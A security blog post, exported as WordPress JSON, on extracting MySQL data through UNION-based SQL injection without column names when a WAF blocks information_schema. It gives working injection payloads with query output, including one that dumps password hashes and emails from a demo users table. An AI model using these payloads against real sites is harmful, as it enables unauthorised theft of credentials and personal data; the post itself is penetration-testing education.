{"id":339,"date":"2019-02-09T14:19:36","date_gmt":"2019-02-09T14:19:36","guid":{"rendered":"http:\/\/blog.redforce.io\/?p=339"},"modified":"2024-12-14T15:24:05","modified_gmt":"2024-12-14T15:24:05","slug":"sqli-extracting-data-without-knowing-columns-names","status":"publish","type":"post","link":"https:\/\/blog.redforce.io\/sqli-extracting-data-without-knowing-columns-names\/","title":{"rendered":"[SQLi] Extracting data without knowing columns names"},"content":{"rendered":"<p><!--more--><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Introduction\"><\/span>Introduction<span class=\"ez-toc-section-end\"><\/span><\/h2><div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 ez-toc-wrap-right counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69dcd41ef03d6\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #ff0000;color:#ff0000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #ff0000;color:#ff0000\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-69dcd41ef03d6\" checked aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/blog.redforce.io\/sqli-extracting-data-without-knowing-columns-names\/#Introduction\" title=\"Introduction\">Introduction<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/blog.redforce.io\/sqli-extracting-data-without-knowing-columns-names\/#Injecting_without_column_names\" title=\"Injecting without column names\">Injecting without column names<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/blog.redforce.io\/sqli-extracting-data-without-knowing-columns-names\/#In_a_nutshell\" title=\"In a nutshell\">In a nutshell<\/a><\/li><\/ul><\/nav><\/div>\n\n<p><em><strong>You can skip that<\/strong><\/em><br \/>\nYou might face a situation in which you have to dump certain data from a certain table from MySQL DB,<br \/>\nTo do so, You got to know the table name, column names you need to dump, which might be a little bit tricky in certain cases.<br \/>\nFor instance, working on MYSQL &lt; 5 or even working on MYSQL =&gt; 5 but the web server itself is behind a WAF blacklisting any call to information_schema, And that was the situation we had.<br \/>\nIn such cases getting DB server version or even DB name would be enough proof of concept for the severity for the vulnerability.<br \/>\nBut we were permitted to proceed with the exploitation, gaining the highest privileges we can.<br \/>\nWe started with table names brute force followed by columns names brute force.<br \/>\nThe only useful entry we got was the table name <strong>users<\/strong> among with couple useless table names.<br \/>\nWe proceeded with the columns names brute force which just returned a single valid column name <strong>id <\/strong>which isn&#8217;t enough to gain further access.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Injecting_without_column_names\"><\/span>Injecting without column names<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>With my teammate <a href=\"https:\/\/twitter.com\/aboul3la\">@aboul3la<\/a>\u00a0we created a dummy SQL DB\u00a0simulating the target&#8217;s one and started searching for a method to extract data from the table without knowing columns names, Which we made after some searching mixed with a lot of trial and error.<\/p>\n<p>Executing the following normal query will return users table contents<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select * from users;\r\n+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n| id | name         | password                                 | email                       | birthdate  | added               |\r\n+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n|  1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org      | 1981-05-03 | 1993-03-20 14:03:14 |\r\n|  2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com   | 1979-10-28 | 2007-01-20 18:38:29 |\r\n|  3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com        | 2005-11-16 | 1992-02-16 04:19:05 |\r\n|  4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com          | 2015-07-22 | 2014-03-05 22:57:18 |\r\n|  5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |\r\n+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n5 rows in set (0.00 sec)<\/pre>\n<p>The columns <span style=\"color: #ff0000;\">name, password, email, birthdate, added<\/span> were selected.<\/p>\n<p>Next step is to convert columns names to any selectable known value,<br \/>\nThis could be converted in SQL to<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select 1,2,3,4,5,6 union select * from users;\r\n+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n| 1 | 2            | 3                                        | 4                           | 5          | 6                   |\r\n+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n| 1 | 2            | 3                                        | 4                           | 5          | 6                   |\r\n| 1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org      | 1981-05-03 | 1993-03-20 14:03:14 |\r\n| 2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com   | 1979-10-28 | 2007-01-20 18:38:29 |\r\n| 3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com        | 2005-11-16 | 1992-02-16 04:19:05 |\r\n| 4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com          | 2015-07-22 | 2014-03-05 22:57:18 |\r\n| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |\r\n+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n6 rows in set (0.00 sec)<\/pre>\n<p>Great, the columns names were replaced from name, password, email, birthdate, added\u00a0to 1, 2, 3, 4, 5, 6 just as we set at the \u00a0<code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">select 1,2,3,4,5,6<\/code>\u00a0part of the query<\/p>\n<p>Next step is selecting the data based on the new numeric values which can be done selecting `field_number` from the previous query with adding any table alias.<br \/>\nUsing the following query\u00a0\u00a0<code class=\"EnlighterJSRAW\" data-enlighter-language=\"sql\">select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;<\/code>\u00a0will select column number 4 which refer to the email address column,<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;\r\n+-----------------------------+\r\n| 4                           |\r\n+-----------------------------+\r\n| 4                           |\r\n| veronica80@example.org      |\r\n| sawayn.amelie@example.com   |\r\n| stefan41@example.com        |\r\n| zwalsh@example.com          |\r\n| pattie.medhurst@example.net |\r\n+-----------------------------+\r\n6 rows in set (0.00 sec)<\/pre>\n<p>changing that to 3 will return the password, 2 will return the name . . and so on<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-385\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-8.49.43-PM.png\" alt=\"\" width=\"1344\" height=\"1294\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-385\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-8.49.43-PM.png\" alt=\"\" width=\"1344\" height=\"1294\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-8.49.43-PM.png 1344w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-8.49.43-PM-300x289.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-8.49.43-PM-768x739.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-8.49.43-PM-1024x986.png 1024w\" sizes=\"auto, (max-width: 1344px) 100vw, 1344px\" \/><\/noscript><\/p>\n<p>Mixing that with our injection payload will result in the final payload \u00a0<code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -<\/code><br \/>\nModify this to fit your needs<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select `2` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+-------+\r\n| author_id | title |\r\n+-----------+-------+\r\n|         1 | alias |\r\n+-----------+-------+\r\n1 row in set (0.00 sec)\r\n\r\nMariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select `3` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+------------------------------------------+\r\n| author_id | title                                    |\r\n+-----------+------------------------------------------+\r\n|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37 |\r\n+-----------+------------------------------------------+\r\n1 row in set (0.00 sec)\r\n\r\nMariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+------------------------+\r\n| author_id | title                  |\r\n+-----------+------------------------+\r\n|         1 | veronica80@example.org |\r\n+-----------+------------------------+\r\n1 row in set (0.00 sec)<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-387\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-9.02.38-PM.png\" alt=\"\" width=\"2024\" height=\"204\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-387\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-9.02.38-PM.png\" alt=\"\" width=\"2024\" height=\"204\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-9.02.38-PM.png 2024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-9.02.38-PM-300x30.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-9.02.38-PM-768x77.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-9.02.38-PM-1024x103.png 1024w\" sizes=\"auto, (max-width: 2024px) 100vw, 2024px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"In_a_nutshell\"><\/span>In a nutshell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote><p>You can achieve that by selecting everything from the target&#8217;s table, converting the column names into any known values then using these values as a field in the select query<br \/>\nFinal payload<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">MariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+-----------------------------------------------------------------+\r\n| author_id | title                                                           |\r\n+-----------+-----------------------------------------------------------------+\r\n|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |\r\n+-----------+-----------------------------------------------------------------+<\/pre>\n<\/blockquote>\n<p>Happy hacking<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Extracting data without knowing columns names from MYSQL < 5 or in case of WAF blacklisting sending information_schema in the request\n<\/p>\n","protected":false},"author":2,"featured_media":342,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[31,32,33],"class_list":["entry","author-a-sultan","has-excerpt","has-more-link","post-339","post","type-post","status-publish","format-standard","has-post-thumbnail","category-web-security","tag-bugbounty","tag-sql-injection","tag-waf-bypass"],"_links":{"self":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/comments?post=339"}],"version-history":[{"count":14,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/339\/revisions"}],"predecessor-version":[{"id":414,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/339\/revisions\/414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media\/342"}],"wp:attachment":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media?parent=339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/categories?post=339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/tags?post=339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}